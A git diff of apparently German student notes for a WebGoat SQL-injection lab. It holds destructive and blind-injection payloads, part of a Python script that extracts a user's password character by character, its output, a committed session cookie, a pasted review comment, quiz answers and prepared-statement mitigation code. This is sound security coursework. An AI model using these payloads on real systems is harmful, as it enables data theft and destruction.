diff --git a/.obsidian/workspace.json b/.obsidian/workspace.json index 255ce5f..3816e14 100644 --- a/.obsidian/workspace.json +++ b/.obsidian/workspace.json @@ -6,7 +6,7 @@ { "id": "08ad9b53ade42d31", "type": "tabs", - "dimension": 45.31147540983606, + "dimension": 62.59025270758123, "children": [ { "id": "e2194e3299515374", @@ -25,7 +25,7 @@ { "id": "47553fa673bb1eb6", "type": "tabs", - "dimension": 54.68852459016394, + "dimension": 37.40974729241877, "children": [ { "id": "20668ba691cd80b3", @@ -202,8 +202,9 @@ "juggl:Juggl global graph": false } }, - "active": "e2194e3299515374", + "active": "b8336cb3c3d06be9", "lastOpenFiles": [ + "Informationssicherheit/Ueb2/2023-04-17_14-16.png", "Untitled 1.md", "Untitled.md", "Informationssicherheit/Ueb2/Ueb2.md", diff --git a/Informationssicherheit/Ueb2/2023-04-17_14-16.png b/Informationssicherheit/Ueb2/2023-04-17_14-16.png new file mode 100644 index 0000000..faca2b0 Binary files /dev/null and b/Informationssicherheit/Ueb2/2023-04-17_14-16.png differ diff --git a/Informationssicherheit/Ueb2/Ueb2.md b/Informationssicherheit/Ueb2/Ueb2.md index 21ab38e..b52dd26 100644 --- a/Informationssicherheit/Ueb2/Ueb2.md +++ b/Informationssicherheit/Ueb2/Ueb2.md @@ -97,6 +97,8 @@ Smith'; DROP TABLE access_log; -- ### 2 - `tom' AND '1'='1` is vergeben + - Es gibt eine if-Abfrage, ob der Name vergeben ist + - Man kann diese mit AND beeinflussen - `tom' AND substring(password,1,1)='t` kann buchstaben des Passworts herrausfinden - "Username taken" bedeutet, dass der Buchstabe richig ist - Durch testen: thisisasecretfortomonly @@ -112,7 +114,7 @@ def sql_injection_advance_5(): password = '' headers = { - 'Cookie': COOKIE, + 'Cookie': 'JSESSIONID=8f8OmDA8QEB8JwmEJtPbWkvVtAM_2AerEHJoWYFT', } while True: 
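Review bot: The new `'Cookie'` header line in the `@@ -112,7 +114,7 @@` hunk embeds a concrete JSESSIONID session token in the notes, replacing the `COOKIE` name the script previously read it from; a session identifier is a credential and does not belong in a committed file even for a local lab instance, because it stays in history after the session has expired and invites copy-paste of the pattern elsewhere. Keep `'Cookie': COOKIE,` and fill the constant from outside the file, e.g. `COOKIE = os.environ["WEBGOAT_COOKIE"]` (constructed variable name) at module level, adding the `os` import next to the script's other imports, which lie outside this hunk. The following `@@ -125,7 +127,7 @@` hunk makes the same move for the target URL, swapping the `HOST:PORT` placeholder for a literal `127.0.0.1:8080`; a single base-URL constant sourced the same way keeps both values out of the notes and makes the placeholder intent explicit. The body of sql_injection_advance_5 continues outside both hunks.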
@@ -125,7 +127,7 @@ def sql_injection_advance_5(): 'confirm_password_reg': 'a' } - r = requests.put('http://HOST:PORT/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data) + r = requests.put('http://127.0.0.1:8080/WebGoat/SqlInjectionAdvanced/challenge', headers=headers, data=data) try: response = json.loads(r.text) 
@@ -144,7 +146,71 @@ def sql_injection_advance_5(): password_index += 1 sql_injection_advance_5() + ``` +Output: +t +th +thi +this +thisi +thisis +thisisa +thisisas +thisisase +thisisasec +thisisasecr +thisisasecre +thisisasecret +thisisasecretf +thisisasecretfo +thisisasecretfor +thisisasecretfort +thisisasecretforto +thisisasecretfortom +thisisasecretfortomo +thisisasecretfortomon +thisisasecretfortomonl +thisisasecretfortomonly + +### 3 +1. What is the difference between a prepared statement and a statement? + - Solution 4: A statement has got values instead of a prepared statement +2. Which one of the following characters is a placeholder for variables? + - Solution 3: ? +3. How can prepared statements be faster than statements? + - Solution 2: Prepared statements are compiled once by the database management system waiting for input and are pre-compiled this way. +4. How can a prepared statement prevent SQL-Injection? + - Solution 3: Placeholders can prevent that the users input gets attached to the SQL query resulting in a seperation of code and data. +5. What happens if a person with malicious intent writes into a register form :Robert); DROP TABLE Students;-- that has a prepared statement? + - Solution 4: The database registers 'Robert' ); DROP TABLE Students;--'. + +## Mitigation + +### 1 +- getConnection +- PreparedStatement +- prepareStatement +- ? +- ? +- setString +- setString + +![[2023-04-17_14-16.png]] + +### 2 +``` java +try { + Connection conn = DriverManager.getConnection(DBURL, DBUSER, DBPW); + PreparedStatement ps = conn.prepareStatement("SELECT * FROM users WHERE name = ?"); + ps.setString(1, "Admin"); + ps.executeUpdate(); +} catch (Exception e) { + System.out.println("Oops. Something went wrong!"); +} +``` + +### 3